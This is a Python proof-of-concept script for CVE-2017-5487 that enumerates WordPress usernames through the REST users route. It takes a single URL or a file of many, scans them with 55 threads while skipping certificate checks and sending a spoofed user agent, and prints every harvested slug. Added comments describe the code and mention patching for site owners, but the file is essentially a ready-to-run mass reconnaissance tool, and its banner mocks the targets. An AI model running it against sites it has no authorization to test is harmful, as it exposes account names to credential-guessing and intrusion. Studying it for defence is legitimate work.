CVE-2017-5487.py
#!/bin/python3
import time
import requests
import argparse
import concurrent.futures
from concurrent.futures import ThreadPoolExecutor
from rich.console import Console
from urllib3 import disable_warnings
from urllib3.exceptions import InsecureRequestWarning
from alive_progress import alive_bar
# Every request in this script is sent with verify=False, so urllib3 would
# print an InsecureRequestWarning per request; silence it once here.
disable_warnings(InsecureRequestWarning)

# Fixed header sent with every request. Because it never varies, this exact
# string is what the tool's traffic looks like in a web server's access log.
user_agent = {
    'User-Agent': 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16',
}

# Shared rich console used for all coloured output.
color = Console()
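def fetch_wordpress_users(target_url):
    """Query a site's WordPress REST users route and print each returned slug.

    Two spellings of the same route are requested in order: the
    ``?rest_route=`` query form and the ``/wp-json/`` form. For the first one
    that answers HTTP 200 with a non-empty JSON body, the ``slug`` of every
    entry is printed next to the target URL and the function returns.

    For site owners: this is the user listing that CVE-2017-5487 concerns.
    Requests to either path are visible in access logs, and the exposure is
    closed by running a patched WordPress release and by restricting
    unauthenticated access to the users route.

    Args:
        target_url: Base URL of the site. The endpoint path is appended
            as-is, so a trailing slash produces a double slash.

    Returns:
        None. Results are written to the console.

    Raises:
        requests.RequestException: On connection failure or timeout.
        ValueError: If a 200 response body is not valid JSON (the exact
            subclass depends on the installed requests version).
    """
    # Slugs are chosen by the remote server. Escaping them keeps a hostile or
    # odd value from being parsed as rich markup (a stray closing tag would
    # raise MarkupError and abort the run).
    from rich.markup import escape

    wordpress_api_endpoints = [
        "/?rest_route=/wp/v2/users/",
        "/wp-json/wp/v2/users/",
    ]
    for endpoint in wordpress_api_endpoints:
        url = f"{target_url}{endpoint}"
        # verify=False: the server certificate is not checked, so the answer
        # is not authenticated and may come from an interposed host.
        response = requests.get(url, timeout=7, headers=user_agent, verify=False, allow_redirects=False)
        if response.status_code == 200:
            user_data = response.json()
            if user_data:
                for user in user_data:
                    color.print(
                        f"[bold green][[/bold green][bold cyan]+[/bold cyan][bold green]][/bold green] [bold cyan]{escape(target_url.ljust(50))}[/bold cyan]",
                        "[bold green][[/bold green]" + "[bold yellow]" + escape(user['slug']) + "[/bold yellow]" + "[bold green]][/bold green]",
                    )
                # NOTE(review): the page lost the file's indentation; the
                # return is placed after the loop over users, so the second
                # endpoint is skipped once the first produced results.
                # Confirm against the original file.
                return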
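def process_file(file):
    """Run fetch_wordpress_users for every URL listed in a file.

    The file is read one URL per line. Each URL is submitted to a pool of 55
    worker threads, a progress bar advances as tasks finish, and a summary
    with the number of tasks that finished without raising and the elapsed
    time is printed at the end.

    Args:
        file: Path of the text file holding the target URLs.

    Returns:
        None. Progress and results are written to the console.

    Raises:
        SystemExit: With status 1 when the file does not exist.
    """
    try:
        with open(file, 'r') as url_file:
            # Skip blank lines: otherwise an empty-looking file passes the
            # "no targets" check and empty URLs are submitted as tasks.
            urls = [entry for entry in (line.strip() for line in url_file) if entry]
    except FileNotFoundError:
        color.print("[red][ERROR][/red] [bold green]That file does not exist my friend :-)[/bold green]")
        # Non-zero status so a wrapping script can tell the run did not happen.
        raise SystemExit(1)

    if not urls:
        # The original message began with a closing tag that had no opener,
        # which rich rejects with MarkupError instead of printing the text.
        color.print("[red][ERROR][/red] [bold green]No targets found in the file.[/bold green]")
        return

    color.print(f"[bold yellow][!][/bold yellow] [bold green]Scanning[/bold green] [red]{len(urls)}[/red] [bold green]targets in[/bold green] [red]{file}[/red]")
    print("")
    start_time = time.time()
    completed_tasks = []
    failed_tasks = []
    with alive_bar(len(urls), title='Scanning Targets', bar='classic', enrich_print=False) as bar:
        with ThreadPoolExecutor(max_workers=55) as executor:
            future_to_url = {executor.submit(fetch_wordpress_users, url): url for url in urls}
            for future in concurrent.futures.as_completed(future_to_url):
                url = future_to_url[future]
                try:
                    future.result()
                    completed_tasks.append(url)
                except Exception:
                    # Best effort: a target that times out, refuses the
                    # connection or returns non-JSON is only counted here and
                    # shows up as the gap in the "out of" summary below.
                    failed_tasks.append(url)
                bar()
    elapsed_time = time.time() - start_time
    print("")
    color.print(f"[bold yellow][!][/bold yellow] [bold green]Finished scanning[/bold green] [red]{len(completed_tasks)}[/red] [bold green]out of [/bold green][red]{len(urls)}[/red] [bold green]targets.[/bold green]")
    color.print(f"[bold yellow][!][/bold yellow] [bold green]Elapsed Time:[/bold green] [red]{elapsed_time:.2f}[/red] [bold green]seconds[/bold green]")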
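def ascii_art():
    """Print the tool's banner and credit lines through the shared console."""
    # Raw string: the art contains backslashes followed by spaces and
    # underscores, which are invalid escape sequences in a normal literal and
    # trigger a warning on recent Python versions. The printed text is the same.
    color.print(r"""[bold green]
/$$$$$$ /$$ /$$ /$$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$$$$$$$ /$$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$$$
/$$__ $$| $$ | $$| $$_____/ /$$__ $$ /$$$_ $$ /$$$$ |_____ $$/ | $$____/ | $$ | $$ /$$__ $$|_____ $$/
| $$ \__/| $$ | $$| $$ |__/ \ $$| $$$$\ $$|_ $$ /$$/ | $$ | $$ | $$| $$ \ $$ /$$/
| $$ | $$ / $$/| $$$$$ /$$$$$$ /$$$$$$/| $$ $$ $$ | $$ /$$//$$$$$$| $$$$$$$ | $$$$$$$$| $$$$$$/ /$$/
| $$ \ $$ $$/ | $$__/|______//$$____/ | $$\ $$$$ | $$ /$$/|______/|_____ $$|_____ $$ >$$__ $$ /$$/
| $$ $$ \ $$$/ | $$ | $$ | $$ \ $$$ | $$ /$$/ /$$ \ $$ | $$| $$ \ $$ /$$/
| $$$$$$/ \ $/ | $$$$$$$$ | $$$$$$$$| $$$$$$/ /$$$$$$ /$$/ | $$$$$$/ | $$| $$$$$$/ /$$/
\______/ \_/ |________/ |________/ \______/ |______/|__/ \______/ |__/ \______/ |__/
[/bold green]
[cyan]--[/cyan][yellow]===[[/yellow] [cyan]Coded with [#FF69B4]<3[/#FF69B4] by K3ysTr0K3R[/cyan] [yellow]]===[/yellow][cyan]--[/cyan]
[cyan]--[/cyan][yellow]===[[/yellow] [cyan]Brought to you by NERDS[/cyan] ;) [yellow]]===[/yellow][cyan]--[/cyan]
[cyan]--[/cyan][yellow]===[[/yellow] [cyan]Your Security makes me wanna go lolololol[/cyan] [yellow]]===[/yellow][cyan]--[/cyan]
""")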
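def main():
    """Parse the command line and run a single-URL or file-based check.

    ``-u/--url`` checks one site directly; ``-f/--file`` hands a list of URLs
    to process_file. When both are given the URL takes precedence, as before.
    When neither is given the usage text is printed, where the original
    exited silently after the banner.
    """
    ascii_art()
    parser = argparse.ArgumentParser(description='A PoC for CVE-2017-5487 - WordPress user enumeration')
    parser.add_argument('-u', '--url', help='Target URL of the WordPress site to gather usernames')
    parser.add_argument('-f', '--file', help='File containing URLs to gather usernames')
    args = parser.parse_args()

    if args.url:
        target_url = args.url
        color.print(f"[bold yellow][!][/bold yellow] [bold green]Scanning[/bold green] [bold green]target url[/bold green] [red]{target_url}[/red]")
        print("")
        # Unlike the file path, nothing catches exceptions here: a timeout or
        # a non-JSON 200 response ends the run with a traceback.
        fetch_wordpress_users(target_url)
    elif args.file:
        process_file(args.file)
    else:
        # No target supplied: show the options rather than doing nothing.
        parser.print_help()


if __name__ == "__main__":
    main()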